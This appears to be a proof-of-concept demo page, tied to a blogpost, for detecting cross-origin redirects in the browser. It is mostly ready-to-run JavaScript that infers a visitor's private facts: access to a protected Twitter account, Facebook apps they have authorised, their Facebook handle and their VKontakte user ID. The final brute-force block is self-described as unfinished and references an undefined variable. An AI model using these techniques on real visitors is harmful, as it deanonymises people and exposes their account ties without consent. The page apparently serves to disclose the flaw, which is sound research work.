URL and redirection detection
Blogpost with description
Run
Log (yes means 100% yes, no means most likely no but can be mistaken because of network speed - double check!)
Other examples (you can copy code to textarea and press Run or simply use firebug/web inspector):
check_redirect('https://twitter.com/PROTECTED/favorites', function(guess){
debug('Has access to protected account: '+ (guess ? 'yes' : 'no'));
})
check_redirect('https://www.facebook.com/dialog/oauth?client_id='+(tryapp=prompt('choose app, e.g. 114545895322903'))+'&redirect_uri=https%3A%2F%2Fm.facebook.com', function(guess){
debug('Authorized app '+tryapp+' '+(guess ? 'no' : 'yes'));
})
// facebook handle detection
var friends = ['john', 'eric', 'egor.homakov', 'alice'];
check_redirect('https://www.facebook.com/profile.php', function(guess){
debug('Guessed handle: '+ (guess ? 'yes' : 'no'));
},function(w){
for(var i in friends){
w.location = 'https://www.facebook.com/'+friends[i]+'#';
}
})
// vkontakte ID detection
var vk_base = 'http://m.vk.com/photos';
var start = parseInt(prompt('In which 100 000 your ID is? for example 12300000'));
var steps = [100000,10000,1000,100,10,1];
var get_assigner = function(from, to){
return function(w){
for(var i=from;i < to;i++){
w.location='http://m.vk.com/photos'+i+'#';
if(i%10000==0) console.log('bunch '+i);
}
}
}
check_redirect(vk_base, function(guess){
debug('ID inside of '+start+' '+(guess ? 'yes' : 'no'));
}, get_assigner(start, start+100000))
// not finished proto of exploit
var get_cb = function(start){
return function(guess){
if(!guess) return false;
var step = steps.shift();
if(step){
for(var i=0;i < 10;i++){
var from = start+i*step;
var to = start+(i+1)*step;
console.log('start from '+from);
(check_redirect(vk_base, get_cb(from,to), get_assigner(from,to)));
}
}else{
debug('vk id found: '+ start);
}
};
}
get_cb(your_mln)(true)